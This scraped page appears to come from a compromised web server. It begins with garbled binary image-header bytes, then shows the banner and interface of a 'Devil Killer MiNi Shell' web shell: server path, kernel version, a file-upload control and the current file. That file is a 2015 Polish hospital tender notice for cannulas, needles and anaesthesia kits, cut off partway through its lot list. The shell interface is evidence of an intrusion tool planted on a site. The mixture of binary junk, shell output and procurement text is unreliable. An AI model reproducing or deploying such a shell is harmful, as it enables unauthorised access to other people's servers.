JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150508/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150508/108132-N-2015.html

<p class="kh_header"><b>Zielona Góra: Sukcesywne dostawy kaniul do żył obwodowych oraz dotętniczych, koreczków do kaniul, różnego rodzaju igieł medycznych, zestawów do znieczuleń zewnątrzoponowych, bezigłowych nasadek i portów do iniekcji, kleszczyków biopsyjnych i pętli do polipektomii oraz klipsów hemostatycznych.</b><br>
<b>Numer ogłoszenia: 108132 - 2015; data zamieszczenia: 08.05.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Szpital Wojewódzki  Samodzielny Publiczny Zakład Opieki Zdrowotnej , ul. Zyty 26, 65-046 Zielona Góra, woj. lubuskie, tel. 068 3296200, faks 068 3255808.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.szpital.zgora.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Sukcesywne dostawy kaniul do żył obwodowych oraz dotętniczych, koreczków do kaniul, różnego rodzaju igieł medycznych, zestawów do znieczuleń zewnątrzoponowych, bezigłowych nasadek i portów do iniekcji, kleszczyków biopsyjnych i pętli do polipektomii oraz klipsów hemostatycznych..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia o łącznej wartości szacunkowej 587 520,00 PLN (zamówienie podstawowe i uzupełniające) są sukcesywne dostawy kaniul do żył obwodowych pediatrycznych i dla dorosłych oraz z systemem zabezpieczającym przed zakłuciem, kaniul dotętniczych, koreczków do kaniul, igieł iniekcyjnych, igieł do akupunktury, igieł do penów, igieł typu Sterican, igieł do biopsji szpiku kostnego mostka i talerza biodrowego oraz do trepanobiopsji szpiku, igieł do portów naczyniowych, igieł do znieczuleń podpajeczynówkowych standard oraz typu Pensil Point, igieł do nakłuć lędźwiowych, igieł do biopsji, igieł do lokalizacji zmian w piersiach, igieł do blokady nerwów obwodowych, igieł do ostrzykiwań, igieł do przezoskrzelowej biopsji aspiracyjnej z użyciem USG do bronchofiberoskopu EBUS firmy Olimpus, kleszczyków biopsyjnych oraz pętli do polipektomii, igieł do biopsji gruboigłowej, zestawów do znieczuleń zewnątrzoponowych, bezigłowych portów do iniekcji, nasadek do pobierania leków i klipsów hemostatycznych.</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Przedmiotem zamówień uzupełniających do 20% wartości zamówienia podstawowego są sukcesywne dostawy kaniul do żył obwodowych pediatrycznych i dla dorosłych oraz z systemem zabezpieczającym przed zakłuciem, kaniul dotętniczych, koreczków do kaniul, igieł iniekcyjnych, igieł do akupunktury, igieł do penów, igieł typu Sterican, igieł do biopsji szpiku kostnego mostka i talerza biodrowego oraz do trepanobiopsji szpiku, igieł do portów naczyniowych, igieł do znieczuleń podpajeczynówkowych standard oraz typu Pensil Point, igieł do nakłuć lędźwiowych, igieł do biopsji, igieł do lokalizacji zmian w piersiach, igieł do blokady nerwów obwodowych, igieł do ostrzykiwań, igieł do przezoskrzelowej biopsji aspiracyjnej z użyciem USG do bronchofiberoskopu EBUS firmy Olimpus, kleszczyków biopsyjnych oraz pętli do polipektomii, igieł do biopsji gruboigłowej, zestawów do znieczuleń zewnątrzoponowych, bezigłowych portów do iniekcji, nasadek do pobierania leków i klipsów hemostatycznych</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 33.14.12.20-8, 33.14.13.23-0, 33.14.13.22-3, 33.14.13.26-1, 33.14.13.20-9, 33.14.13.27-8, 33.17.13.00-2, 33.14.13.21-6, 33.14.16.40-8, 33.16.80.00-5, 33.14.10.00-0, 33.14.00.00-3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 17.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Przed upływem terminu składania ofert wykonawca zobowiązany jest wnieść wadium w wysokości ustalonej dla poszczególnego zadania:
- zadanie nr	1 -	   600,00 PLN
- zadanie nr	2 -	3 000,00 PLN
- zadanie nr	3 -	   500,00 PLN
- zadanie nr	4 -	1 700,00 PLN
- zadanie nr	5 -	1 000,00 PLN
- zadanie nr	6 -	   600,00 PLN
- zadanie nr	7 -	   150,00 PLN
- zadanie nr	8 -	   300,00 PLN
- zadanie nr	9 -	   400,00 PLN
- zadanie nr	10 -	     60,00 PLN
- zadanie nr	11 -	   120,00 PLN
- zadanie nr	12 -	   600,00 PLN
- zadanie nr	13 -	   250,00 PLN
- zadanie nr	14 -	   150,00 PLN
- zadanie nr	15 -	   100,00 PLN
- zadanie nr	16 -	   120,00 PLN
- zadanie nr	17 -	   400,00 PLN</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy dysponują zasobami niezbędnymi do realizacji przedmiotu zamówienia- zadania lub zadań w zakresie posiadanej wiedzy i doświadczenia. Ocena spełniania przez wykonawców przedmiotowego warunku udziału w postępowaniu dokonana zostanie według kryterium /spełnia - nie spełnia/ na podstawie analizy treści przedłożonego/ ych dokumentu/ ów: oświadczenie wykonawcy oraz ewentualnie właściwe zobowiązanie podmiotu trzeciego udostępniającego zasób w zakresie wiedzy i doświadczenia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy dysponują zasobami niezbędnymi do realizacji przedmiotu zamówienia - zadania lub zadań w zakresie dysponowania odpowiednim potencjałem technicznym. Ocena spełniania przez wykonawców przedmiotowego warunku udziału w postępowaniu dokonana zostanie według kryterium / spełnia - nie spełnia / na podstawie analizy treści przedłożonego/ ych dokumentu/ ów: oświadczenie wykonawcy oraz ewentualnie właściwe zobowiązanie podmiotu trzeciego udostępniającego zasób w zakresie dysponowania odpowiednim potencjałem technicznym</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy dysponują zasobami niezbędnymi do realizacji przedmiotu zamówienia - zadania lub zadań w zakresie dysponowania osobami zdolnymi do wykonania zamówienia. Ocena spełniania przez wykonawców przedmiotowego warunku udziału w postępowaniu dokonana zostanie według kryterium / spełnia - nie spełnia / na podstawie analizy treści przedłożonego/ ych dokumentu/ ów: oświadczenie wykonawcy oraz ewentualnie właściwe zobowiązanie podmiotu trzeciego udostępniającego zasób w zakresie dysponowania osobami zdolnymi do wykonania zamówienia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy dysponują zasobami niezbędnymi do realizacji przedmiotu zamówienia- zadania lub zadań w zakresie sytuacji ekonomicznej i finansowej. Ocenia spełniania przez wykonawców przedmiotowego warunku udziału w postępowaniu dokonana zostanie według kryterium / spełnia - nie spełnia / na podstawie analizy treści przedłożonego/ ych dokumentu/ ów: 1) oświadczenie wykonawcy oraz ewentualnie właściwe zobowiązanie podmiotu udostępniającego zasób dotyczący zdolności finansowej 2)opłacona polisa, a w przypadku jej braku inny właściwy dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia - zadania na kwotę co najmniej:
- 15 000,00 złotych, jeżeli składana oferta dotyczyć będzie wyłącznie zadania  nr 1, nr 10, nr 12,
- 70 000,00 złotych, jeżeli składana oferta dotyczyć będzie wyłącznie zadania  nr 2,
- 12 500,00 złotych, jeżeli składana oferta dotyczyć będzie wyłącznie zadania  nr 3,
- 40 000,00 złotych, jeżeli składana oferta dotyczyć będzie wyłącznie zadania  nr 4,
- 25 000,00 złotych, jeżeli składana oferta dotyczyć będzie wyłącznie zadania  nr 5, nr 11,
- 14 000,00 złotych, jeżeli składana oferta dotyczyć będzie wyłącznie zadania  nr 6,
- 48 000,00 złotych, jeżeli składana oferta dotyczyć będzie wyłącznie zadania  nr 7, nr 14, nr 16,
-   7 000,00 złotych, jeżeli składana oferta dotyczyć będzie wyłącznie zadania  nr 8,
- 10 000,00 złotych, jeżeli składana oferta dotyczyć będzie wyłącznie zadania  nr 9,
-   5 000,00 złotych, jeżeli składana oferta dotyczyć będzie wyłącznie zadania  nr 13,
-   2 000,00 złotych, jeżeli składana oferta dotyczyć będzie wyłącznie zadania  nr 15,
-   9 000,00 złotych, jeżeli składana oferta dotyczyć będzie wyłącznie zadania  nr 17,
UWAGI : W przypadku składania oferty obejmującej więcej niż jedno zadanie wartość  przedmiotowego dokumentu powinna odpowiadać co najmniej najwyższej wartości wymaganej
dla zadania ujętego w takiej ofercie.
Jeżeli wykonawca przedkłada polisę z której wynika, że termin płatności, pierwszej raty składki ubezpieczenia lub całości składki ubezpieczenia został odroczony i upływa po terminie składania ofert, to również ma obowiązek udokumentować fakt opłacenia przed upływem terminu składania ofert przedmiotowej - odroczonej pierwszej raty składki lub całości składki ubezpieczenia. Każda przedkładana polisa musi być opłacona</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - Termin realizacji dostaw częściowych - 10</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Strony dopuszczają zmiany postanowień zawartej umowy w stosunku do    treści oferty, na podstawie której dokonano wyboru wykonawcy w przypadku: 
1) zmiany danych podmiotowych Wykonawcy (np. w wyniku przekształcenia, przejęcia itp.),
2) zmiany cen jednostkowych przedmiotu umowy w sytuacji okresowych promocji, bądź obniżenia ceny przez producenta w trakcie trwania umowy,
3) szczególnych okoliczności takich jak zaprzestanie lub wstrzymanie wytwarzania wyrobów objętych umową, wygaśnięcia świadectwa ich rejestracji albo wycofania ze sprzedaży.
W powyższych przypadkach Strony mogą dopuścić dostarczenie odpowiedników o parametrach nie gorszych od wyrobów objętych umową.
Cena dostarczonego  odpowiednika nie może być wyższa od ceny wyrobu zastąpionego.
4) zmiany sposobu konfekcjonowania i wielkości jednostkowej wyrobu, którego cena po odpowiednim przeliczeniu nie będzie wyższa niż cena wyrobu objętego umową.
5) konieczności przesunięcia terminów umownych, jeżeli konieczność ta, nastąpiła na skutek okoliczności, których nie można było przewidzieć w chwili zawierania niniejszej  umowy np. siły wyższej.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.szpital.zgo.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Siedziba zamawiającego, budynek A-administracji, pokój 019 - cena 18,50 PLN + koszty przekazania.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 20.05.2015 godzina 10:00, miejsce: Siedziba zamawiającego , budynek A-administracji, pokój 201, sekretariat..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Kaniule do żył obwodowych bez portu bocznego oraz koreczków do kaniul.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia o łącznej wartości szacunkowej 36 540,00 PLN (zamówienie podstawowe i uzupełniające) są sukcesywne dostawy kaniuli do żył obwodowych bez portu bocznego oraz koreczków do kaniul.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.12.20-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Termin realizacji dostaw częściowych - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Kaniule do żył obwodowych z portem bocznym oraz kaniule do żył obwodowych z portem bocznym  i  systemem zabezpieczającym przed zakłuciem.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia o łącznej wartości szacunkowej 172 740,00 PLN (zamówienie podstawowe i uzupełniające) są sukcesywne dostawy kaniuli do żył obwodowych z portem bocznym oraz kaniuli do żył obwodowych z portem bocznym i systemem zabezpieczającym przed zakłuciem.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.12.20-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Termin realizacji dostaw częściowych - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Igły do trepanobiopsji szpiku.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia o łącznej wartości szacunkowej 30 840,00 PLN (zamówienie podstawowe i uzupełniające) są sukcesywne dostawy igieł do trepanobiopsji szpiku.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.13.23-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Termin realizacji dostaw częściowych - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Igły typu Hubera z drenem do portów podskórnych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia o łącznej wartości szacunkowej 99 900,00 PLN (zamówienie podstawowe i uzupełniające) są sukcesywne dostawy igieł typu Hubera z drenem do portów podskórnych.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.13.22-3, 33.14.13.26-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Termin realizacji dostaw częściowych - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Igły do przezoskrzelowej biopsji aspiracyjnej z użyciem USG do posiadanego  przez zamawiającego bronchofiberoskopu EBUS firmy Olympus.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia o łącznej wartości szacunkowej 60 000,00 PLN (zamówienie podstawowe i uzupełniające) są sukcesywne dostawy igieł do przezoskrzelowej biopsji aspiracyjnej z użyciem USG do posiadanego  przez zamawiającego bronchofiberoskopu EBUS firmy Olympus.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.13.22-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Termin realizacji dostaw częściowych - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Igły jednokrotnego użytku, igły do akupunktury, igły do penów oraz igły typu Sterican.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia o łącznej wartości szacunkowej 34 800,00 PLN (zamówienie podstawowe i uzupełniające) są sukcesywne dostawy igieł jednokrotnego użytku, igieł do akupunktury, igieł do penów oraz igieł typu Sterican.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.13.20-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Termin realizacji dostaw częściowych - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Zestawy do znieczulania zewnątrzoponowego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia o łącznej wartości szacunkowej 7 680,00 PLN (zamówienie podstawowe i uzupełniające) są sukcesywne dostawy zestawów do znieczulania   zewnątrzoponowego.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.17.13.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Termin realizacji dostaw częściowych - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Igły do biopsji szpiku kostnego mostka i talerza biodrowego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia o łącznej wartości szacunkowej 16 800,00 PLN (zamówienie podstawowe i uzupełniające) są sukcesywne dostawy igieł do biopsji szpiku kostnego mostka i talerza biodrowego.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.13.23-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Termin realizacji dostaw częściowych - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Igły  do znieczuleń podpajęczynówkowych typu Pencil-Point oraz standardowych, igły do nakłuć lędźwiowych.</p>
